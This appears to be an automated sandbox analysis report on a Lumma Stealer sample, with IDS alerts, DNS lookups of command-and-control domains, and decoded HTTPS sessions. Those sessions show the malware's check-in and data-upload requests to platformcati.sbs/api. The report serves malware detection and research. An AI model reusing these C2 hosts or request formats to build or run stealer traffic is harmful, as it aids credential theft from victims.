2025-01-27T14:54:46.133395+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49871 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:48.988318+0100 | 2056707 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) | 1 | 192.168.2.7 | 49892 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:48.988318+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49892 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:49.797125+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49892 | 104.21.112.1 | 443 | TCP
• Total Packets: 103
• 443 (HTTPS)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Jan 27, 2025 14:54:41.577687979 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.577939034 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.579087019 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.579212904 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.579247952 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:41.579324007 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:41.579335928 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.362199068 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.362304926 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.362477064 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.374114037 CET49849443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.374146938 CET44349849104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.723128080 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.723197937 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:42.723280907 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.723656893 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:42.723675013 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:43.214184046 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:43.214282036 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:43.215285063 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:43.215306997 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:43.216335058 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:43.220967054 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:43.221081018 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:43.221122980 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.046622992 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.046715021 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.046788931 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.047036886 CET49860443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.047053099 CET44349860104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.513175964 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.513217926 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:45.513290882 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.513607979 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:45.513621092 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.133275032 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.133394957 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.134836912 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.134845018 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.135890007 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.156229973 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.157104969 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.157186031 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.157366991 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.157428026 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.158066988 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.158133984 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.158472061 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.158502102 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.158629894 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.158667088 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.159006119 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159034967 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.159044981 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159058094 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.159159899 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159188032 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.159204960 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159323931 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.159360886 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.167706013 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.167855024 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.167885065 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.167922974 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.167932987 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.168001890 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:46.168019056 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:46.168090105 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.473634958 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.473763943 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.474025011 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.474025011 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.492146969 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.492198944 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.492290020 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.492604971 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.492620945 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.783835888 CET49871443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.783869982 CET44349871104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.988239050 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.988317966 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.989905119 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.989917994 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.990248919 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:48.991606951 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.991714954 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:48.991750002 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:49.797132969 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:49.797240019 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:49.797322035 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:49.797506094 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:49.797522068 CET44349892104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:49.797535896 CET49892443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:49.797540903 CET44349892104.21.112.1192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 27, 2025 14:54:13.379336119 CET  61325        53         192.168.2.7  1.1.1.1
Jan 27, 2025 14:54:13.391993046 CET  53           61325      1.1.1.1      192.168.2.7
Jan 27, 2025 14:54:49.800844908 CET  50527        53         192.168.2.7  1.1.1.1
Jan 27, 2025 14:54:49.811139107 CET  53           50527      1.1.1.1      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
Jan 27, 2025 14:54:13.379336119 CET  192.168.2.7  1.1.1.1  0xb39a    Standard query (0)  platformcati.sbs         A (IP address)  IN (0x0001)  false
Jan 27, 2025 14:54:49.800844908 CET  192.168.2.7  1.1.1.1  0x9a5b    Standard query (0)  itsrevolutionmagnus.xyz  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                     CName  Address       Type            Class        DNS over HTTPS
Jan 27, 2025 14:54:13.391993046 CET  1.1.1.1    192.168.2.7  0xb39a    No error (0)    platformcati.sbs                104.21.112.1  A (IP address)  IN (0x0001)  false
Jan 27, 2025 14:54:13.391993046 CET  1.1.1.1    192.168.2.7  0xb39a    No error (0)    platformcati.sbs                104.21.32.1   A (IP address)  IN (0x0001)  false
Jan 27, 2025 14:54:13.391993046 CET  1.1.1.1    192.168.2.7  0xb39a    No error (0)    platformcati.sbs                104.21.16.1   A (IP address)  IN (0x0001)  false
Jan 27, 2025 14:54:13.391993046 CET  1.1.1.1    192.168.2.7  0xb39a    No error (0)    platformcati.sbs                104.21.96.1   A (IP address)  IN (0x0001)  false
Jan 27, 2025 14:54:13.391993046 CET  1.1.1.1    192.168.2.7  0xb39a    No error (0)    platformcati.sbs                104.21.80.1   A (IP address)  IN (0x0001)  false
Jan 27, 2025 14:54:13.391993046 CET  1.1.1.1    192.168.2.7  0xb39a    No error (0)    platformcati.sbs                104.21.48.1   A (IP address)  IN (0x0001)  false
Jan 27, 2025 14:54:13.391993046 CET  1.1.1.1    192.168.2.7  0xb39a    No error (0)    platformcati.sbs                104.21.64.1   A (IP address)  IN (0x0001)  false
Jan 27, 2025 14:54:49.811139107 CET  1.1.1.1    192.168.2.7  0x9a5b    Name error (3)  itsrevolutionmagnus.xyz  none   none          A (IP address)  IN (0x0001)  false
• platformcati.sbs

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49702        104.21.112.1    443               7392  C:\Users\user\Desktop\h226x41CQ6.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-27 13:54:14 UTC  263                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: platformcati.sbs
2025-01-27 13:54:14 UTC  8                  OUT        Data Ascii: act=life
2025-01-27 13:54:14 UTC  554                IN         HTTP/1.1 403 Forbidden
    Date: Mon, 27 Jan 2025 13:54:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ytAmym0fDG84%2BuNPN9G4V3Rqn5msHjz4g%2FlpdzaN3F09tKJaR8IZSx5%2FGdW5Q52YGbKIR9uzHM7NF2oJkJpOrJIQwf563tdd%2BX90LASK1N12ukWzU1ZUtSPT3kRsVfAyzuLc"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90893bc64a38424b-EWR
2025-01-27 13:54:14 UTC  815                IN         Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-01-27 13:54:14 UTC  1369               IN         Data Ascii: es/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('c
2025-01-27 13:54:14 UTC  1369               IN         Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="
2025-01-27 13:54:14 UTC  1003               IN         Data Ascii: f-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performan
2025-01-27 13:54:14 UTC  5                  IN         Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.749703104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:15 UTC353OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 42
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:15 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d
                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=
                                                                                      2025-01-27 13:54:15 UTC1126INHTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:15 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qpvhki1feci67og6ok6al04t23; expires=Fri, 23 May 2025 07:40:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDPkC2YRmdLTmLmOwlvGAZgd50rw5tEXI2F4B3Rgo%2BTL5TAgj7xmmZyTSc5RblWrsiVRszjep058O1sn%2FIL4gfHitlYJEoj%2FZzq%2FFPiGA583QMFPxs%2BnSQ2PQ80ARbJ8IU1o"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90893bce6d9843b3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1596&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1031&delivery_rate=1794714&cwnd=212&unsent_bytes=0&cid=a2d5ea389e56c420&ts=515&x=0"
2025-01-27 13:54:15 UTC  IN  Data: [chunked response body; hex and ASCII dump omitted]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.7  49705        104.21.112.14   443               7392  C:\Users\user\Desktop\h226x41CQ6.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-27 13:54:16 UTC  371                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12839
Host: platformcati.sbs
2025-01-27 13:54:16 UTC  12839              OUT        Data Ascii (CRLF line breaks restored from the raw dump):
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

F5B2531BC89A944A3005F2057D2C7D6C
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2025-01-27 13:54:39 UTC  1124               IN         HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 13:54:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7451blj4d1bpe1pa5ogpbdcdc6; expires=Fri, 23 May 2025 07:40:56 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbrRU8%2Bl4K4JvS0a8VMOoCRzLZVR9pPHUR1ERXPzzcdeh6kbVedkvY2SQq6KcBAtavi2x6PT6zbptyfRziGaVc4DfsDDTz1PN97RGdVzZ4lKvwHIJOyl%2BNb87PqFdZoM7GQr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90893bd6fbf4729f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1956&rtt_var=747&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13868&delivery_rate=1452013&cwnd=178&unsent_bytes=0&cid=8cfd452a9dca3487&ts=22734&x=0"
2025-01-27 13:54:39 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-27 13:54:39 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49838        104.21.112.14   443               7392  C:\Users\user\Desktop\h226x41CQ6.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-27 13:54:40 UTC  371                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15071
Host: platformcati.sbs
2025-01-27 13:54:40 UTC  15071              OUT        Data Ascii (CRLF line breaks restored from the raw dump):
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

F5B2531BC89A944A3005F2057D2C7D6C
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2025-01-27 13:54:40 UTC  1129               IN         HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 13:54:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5mthutthlnnhuu3d9ovkd2c06s; expires=Fri, 23 May 2025 07:41:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHHrig3%2Fnenho3YSBLFlHhSyFIhpjkForgvHK7akld3L%2FByCboWqFjOiL9xg42iYmfurr%2FfBvskTvVTciw3WhSluFCAQKn5mFTgxYzSqzrJCkhd5DVxTgvqliJdHc%2BQMg%2FJq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90893c6929540f5b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1646&rtt_var=724&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16100&delivery_rate=1773997&cwnd=221&unsent_bytes=0&cid=32d7aabe130006a1&ts=779&x=0"
2025-01-27 13:54:40 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-27 13:54:40 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.7  49849        104.21.112.14   443               7392  C:\Users\user\Desktop\h226x41CQ6.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-27 13:54:41 UTC  371                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20396
Host: platformcati.sbs
2025-01-27 13:54:41 UTC  15331              OUT        Data Ascii (CRLF line breaks restored from the raw dump):
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

F5B2531BC89A944A3005F2057D2C7D6C
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

3
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2025-01-27 13:54:41 UTC  5065               OUT        Data: [binary payload; hex dump omitted]
2025-01-27 13:54:42 UTC  1121               IN         HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 13:54:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=voggn0gn19us98me8o0kj9hptd; expires=Fri, 23 May 2025 07:41:20 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHKPWTsNzmlEPpAtNyIcoOFTGrVkXGGOPrUfzThl5eQZq75CksLX127cJJejYLVE0jJYBxnraDgnQ4MJHTOFdIobMp4GMhGx3PjPPCm%2BGvy0Srys3bYiEK91OQJ0h19nnfOp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90893c722cdf0f5b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1651&rtt_var=634&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21447&delivery_rate=1704611&cwnd=221&unsent_bytes=0&cid=60d54dd758a70adf&ts=792&x=0"
2025-01-27 13:54:42 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-27 13:54:42 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.749860104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:43 UTC370OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 2451
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:43 UTC | 2451 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 42 32 35 33 31 42 43 38 39 41 39 34 34 41 33 30 30 35 46 32 30 35 37 44 32 43 37 44 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F5B2531BC89A944A3005F2057D2C7D6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                      2025-01-27 13:54:45 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:44 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=7rpgk8api2faummj8hfv2hnnbp; expires=Fri, 23 May 2025 07:41:23 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNlO26Y7WMjmBuNVvHhgXsPcUfyh%2FQPMlaPuYVUfUZXyAzq4F%2FJDMZrrGg6ILWpNGPKZGrGYZzN9b%2Ff9gJKhVYHUIeNrD%2BxHe2FG9IZ9%2BZVnM0hVVaheaubVzWBcTIN1pmzt"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893c82db13729f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1964&rtt_var=796&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=3457&delivery_rate=1324263&cwnd=178&unsent_bytes=0&cid=6d7a674fb827846b&ts=1843&x=0"
